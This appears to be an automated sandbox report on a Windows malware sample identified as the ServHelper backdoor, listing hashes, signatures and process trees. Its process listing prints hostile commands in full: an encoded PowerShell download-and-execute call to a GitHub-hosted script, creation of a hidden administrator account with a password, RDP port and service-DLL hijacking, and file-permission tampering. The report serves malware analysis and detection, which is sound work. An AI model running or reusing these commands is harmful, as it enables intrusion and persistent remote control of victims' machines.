Analysis
-
max time kernel
138s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
29-03-2024 11:44
Static task
static1
Behavioral task
behavioral1
Sample
211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
Resource
win10v2004-20231215-en
General
-
Target
211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe
-
Size
5.7MB
-
MD5
211ca7c8d5fd20f7dcaebdbe354662be
-
SHA1
1111e864f3e9d2e6879c5179c4136638b05b67c9
-
SHA256
aefb4a2472f0517d58cae7e5e0c9c51b4e36b39f6096dbffc6b8cc18d0be7175
-
SHA512
d7e6e638cdfd4792a09d671f4e61de715a63a9001283594e6c73d5a88dfc8b91d201fc19b1228b7b1a654f9abb8cf52893d3cc02aea142a1c5c7b9d3f876e24f
-
SSDEEP
49152:sr/U2Wrb/T/vO90dL3BmAFd4A64nsfJ1gBO55+1TEf1q7NOVuZnsm/QBrkdL+DLk:srDnOOWmAQQQQQQQQQQQQQ
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 5 3060 powershell.exe 6 3060 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid Process 3044 icacls.exe 1780 icacls.exe 1324 icacls.exe 2972 takeown.exe 2276 icacls.exe 2080 icacls.exe 804 icacls.exe 2940 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid Process 892 892 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exepid Process 2940 icacls.exe 3044 icacls.exe 1780 icacls.exe 1324 icacls.exe 2972 takeown.exe 2276 icacls.exe 2080 icacls.exe 804 icacls.exe -
Processes:
resource yara_rule behavioral1/files/0x000b000000015c73-100.dat upx behavioral1/files/0x0004000000004ed7-101.dat upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3FXW0VJO33A3CCQ0U2J2.temp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exepowershell.exeWMIC.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 408d938bce81da01 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2948 powershell.exe 908 powershell.exe 1192 powershell.exe 268 powershell.exe 2948 powershell.exe 2948 powershell.exe 2948 powershell.exe 3060 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid Process 464 892 892 892 892 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 908 powershell.exe Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 268 powershell.exe Token: SeRestorePrivilege 2080 icacls.exe Token: SeAssignPrimaryTokenPrivilege 2764 WMIC.exe Token: SeIncreaseQuotaPrivilege 2764 WMIC.exe Token: SeAuditPrivilege 2764 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2764 WMIC.exe Token: SeIncreaseQuotaPrivilege 2764 WMIC.exe Token: SeAuditPrivilege 2764 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2476 WMIC.exe Token: SeIncreaseQuotaPrivilege 2476 WMIC.exe Token: SeAuditPrivilege 2476 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2476 WMIC.exe Token: SeIncreaseQuotaPrivilege 2476 WMIC.exe Token: SeAuditPrivilege 2476 WMIC.exe Token: SeDebugPrivilege 3060 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exedescription pid Process procid_target PID 3052 wrote to memory of 2948 3052 211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe 29 PID 3052 wrote to memory of 2948 3052 211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe 29 PID 3052 wrote to memory of 2948 3052 211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe 29 PID 2948 wrote to memory of 2672 2948 powershell.exe 31 PID 2948 wrote to memory of 2672 2948 powershell.exe 31 PID 2948 wrote to memory of 2672 2948 powershell.exe 31 PID 2672 wrote to memory of 2864 2672 csc.exe 32 PID 2672 wrote to memory of 2864 2672 csc.exe 32 PID 2672 wrote to memory of 2864 2672 csc.exe 32 PID 2948 wrote to memory of 908 2948 powershell.exe 33 PID 2948 wrote to memory of 908 2948 powershell.exe 33 PID 2948 wrote to memory of 908 2948 powershell.exe 33 PID 2948 wrote to memory of 1192 2948 powershell.exe 35 PID 2948 wrote to memory of 1192 2948 powershell.exe 35 PID 2948 wrote to memory of 1192 2948 powershell.exe 35 PID 2948 wrote to memory of 268 2948 powershell.exe 37 PID 2948 wrote to memory of 268 2948 powershell.exe 37 PID 2948 wrote to memory of 268 2948 powershell.exe 37 PID 2948 wrote to memory of 2972 2948 powershell.exe 41 PID 2948 wrote to memory of 2972 2948 powershell.exe 41 PID 2948 wrote to memory of 2972 2948 powershell.exe 41 PID 2948 wrote to memory of 2276 2948 powershell.exe 42 PID 2948 wrote to memory of 2276 2948 powershell.exe 42 PID 2948 wrote to memory of 2276 2948 powershell.exe 42 PID 2948 wrote to memory of 2080 2948 powershell.exe 43 PID 2948 wrote to memory of 2080 2948 powershell.exe 43 PID 2948 wrote to memory of 2080 2948 powershell.exe 43 PID 2948 wrote to memory of 804 2948 powershell.exe 44 PID 2948 wrote to memory of 804 2948 powershell.exe 44 PID 2948 wrote to memory of 804 2948 powershell.exe 44 PID 2948 wrote to memory of 2940 2948 powershell.exe 45 PID 2948 wrote to memory of 2940 2948 powershell.exe 45 PID 2948 wrote to memory of 2940 2948 powershell.exe 45 PID 2948 wrote to memory of 3044 2948 powershell.exe 46 PID 2948 wrote to memory of 3044 2948 powershell.exe 46 PID 2948 wrote to memory of 3044 2948 powershell.exe 46 PID 2948 wrote to memory of 1780 2948 powershell.exe 47 PID 2948 wrote to memory of 1780 2948 powershell.exe 47 PID 2948 wrote to memory of 1780 2948 powershell.exe 47 PID 2948 wrote to memory of 1324 2948 powershell.exe 48 PID 2948 wrote to memory of 1324 2948 powershell.exe 48 PID 2948 wrote to memory of 1324 2948 powershell.exe 48 PID 2948 wrote to memory of 904 2948 powershell.exe 49 PID 2948 wrote to memory of 904 2948 powershell.exe 49 PID 2948 wrote to memory of 904 2948 powershell.exe 49 PID 2948 wrote to memory of 2392 2948 powershell.exe 50 PID 2948 wrote to memory of 2392 2948 powershell.exe 50 PID 2948 wrote to memory of 2392 2948 powershell.exe 50 PID 2948 wrote to memory of 2140 2948 powershell.exe 51 PID 2948 wrote to memory of 2140 2948 powershell.exe 51 PID 2948 wrote to memory of 2140 2948 powershell.exe 51 PID 2948 wrote to memory of 988 2948 powershell.exe 52 PID 2948 wrote to memory of 988 2948 powershell.exe 52 PID 2948 wrote to memory of 988 2948 powershell.exe 52 PID 988 wrote to memory of 1912 988 net.exe 53 PID 988 wrote to memory of 1912 988 net.exe 53 PID 988 wrote to memory of 1912 988 net.exe 53 PID 2948 wrote to memory of 924 2948 powershell.exe 54 PID 2948 wrote to memory of 924 2948 powershell.exe 54 PID 2948 wrote to memory of 924 2948 powershell.exe 54 PID 924 wrote to memory of 2812 924 cmd.exe 55 PID 924 wrote to memory of 2812 924 cmd.exe 55 PID 924 wrote to memory of 2812 924 cmd.exe 55 PID 2812 wrote to memory of 2928 2812 cmd.exe 56
Processes
-
C:\Users\Admin\AppData\Local\Temp\211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\211ca7c8d5fd20f7dcaebdbe354662be_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\meg1wxye.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA249.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA248.tmp"4⤵PID:2864
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2972
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2276
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:804
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2940
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3044
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1780
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1324
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:904
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:2392
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2140
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1912
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:2928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1880
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:2796
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1872
-
C:\Windows\system32\net.exenet start TermService5⤵PID:2056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1856
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2024
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2028
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:2900
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:2388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:2792
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc tRbJrwC9 /add1⤵PID:3024
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc tRbJrwC9 /add2⤵PID:2256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc tRbJrwC9 /add3⤵PID:1128
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1328
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1784
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" PIRBKNPS$ /ADD1⤵PID:872
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" PIRBKNPS$ /ADD2⤵PID:1956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" PIRBKNPS$ /ADD3⤵PID:1468
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:368
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1728
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc tRbJrwC91⤵PID:2904
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc tRbJrwC92⤵PID:2332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc tRbJrwC93⤵PID:3020
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2656
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2428
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2864
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD591e200e200ec4eafe2d0dbcc297f193c
SHA105e83c7839c32b5e609570a6f1bfbd010c70a3f6
SHA2568961123e2d19bc468f4d3da38aa35df7d073c3d7eb287ed82590b01f3d2f4a60
SHA512d3fb690a01cfe3e6563b835db92b00b78093745839d5d33ab67fa83b3dee00aa9bb781acb7084e30a8d245c7e22ba77ee3cc7e2f1a607d3dd5902bfd12518e45
-
Filesize
2.5MB
MD5a9176019ae2f0af22af200ca4f842b59
SHA122c13657a4210aca116ab63d2f806906dda954fd
SHA256af452873200eda5950c1dedbfed833da08b697cea98402cd16478df89d770739
SHA5125171e192c05a60aca06c5b4e12b69744f870a64d8c69289205f7aa082dbe1913cadd7fe4ab8d16f2d2d5eab0ebb687c68d5448b8a821c5912ec9670572d6ad3b
-
Filesize
3KB
MD519d4d141c8a7ab830079a13d896fd6d6
SHA1da9152cd5af0f59cc05d4d24859cc8be850fbbd1
SHA256adb7b5b62050fb1701b549e34b082c83db9f4341135c3210de61f541da309830
SHA512126e8263787ede37972cac47d4e547a53471eea3bb22cb3ef577df36cb8cae896100964e4f3bd074ecb6454c284cb703c63af0e314bbcc9bc328e623b9f6b457
-
Filesize
7KB
MD57051cf22b5426cd594629cb823748f0b
SHA14c2894217fb1cd771865ede3fecdce049ac49a90
SHA256f3fcf5b3a25dbac711f474da992e879076f17ca10edbcff138d0f1d3dc0554e6
SHA512199fc0e8ee7cec11104aea3a9d3870b96a081fc20a251f9a3b93100cb2f3047be3bb2a70780b576ed6878c3b9282b88243a7220887da14f1ea17a83fc6933f39
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ed821d5127a58720de1169b7172d168a
SHA1c18fbcd6fff31f46c0b9ee711cd7d9e29428b089
SHA256011712b764950825210260227504190e9b56752eee4863f290286a5e149e756a
SHA5122e1758d2668dcac3be99c8a121684ea2b49e737e892e0f161a18d3c305cf23e51f34c97dace7abd0a922bbf1e2723c8342e7cb15beae9ee0877a1f6732227c96
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD573615fcacfdad7b8f9114b4c6b359b1e
SHA1c79079e489de262f94bd303f2b2caf79a3039000
SHA2568077682460ec147b1dd13e5e428ddda3a64e3b1b93c0193662a8170af1b8b707
SHA512e1a1a72fc31fa5bbb8905850754ff231484deb778c1c51a19966987b46e56602d4b9c93567d47a229bfd92ec56355b19852dbbc83edcde280c3186ec0ebfae16
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
309B
MD5316ecf0079c434e32aa24fb43e41bc67
SHA1e0bcdfc8d2bff0d1bae6572753bc7ad1a5ed8814
SHA2569aa2014a0e88d546bf949512050aeb33d2ee601270e94d43b8cf05a4301a971d
SHA51215b6e31cc0ab65d6dde5542a7f6e6e367f98e9fa866ff6c9cf22938d097b7808e304033b8be57c4c7edd8cab52ddd204a804b765cb7b9fa6df834dc1a437c5d3
-
Filesize
60KB
MD59453615d542c9b0d521b429b9794e07d
SHA16c543926f7fcb171970bcca59a4fff36873a50a3
SHA256b59ab823d4ce1e90b39ac043ded78549b60c62b296c85b7c423d3494af220c34
SHA512b6816d54bc1790107293f304d3252d84ecb92c6d2fd4b017537329be1fada98322766109c1306d71540cda3ef7936e3f2c0eabd894a9f2fc56183b1add292c34
-
Filesize
743KB
MD51b1412c2f9d041ad20da79f2d5a3b130
SHA18ac8f1a8c75daf1f150f6bb103c1ccc510067758
SHA256126438fadef33a97efa43b1339c5cb6e2b45dd81329381968da74909cc1aaa1f
SHA5123dbcc808c88d8098887f7a69e182d25c17aef23f3f1e7d5fc290792bb99be5a35f62169055fddf42a7082800ddd069ddfb3f2f2742d8687bab30065dc7fb74bc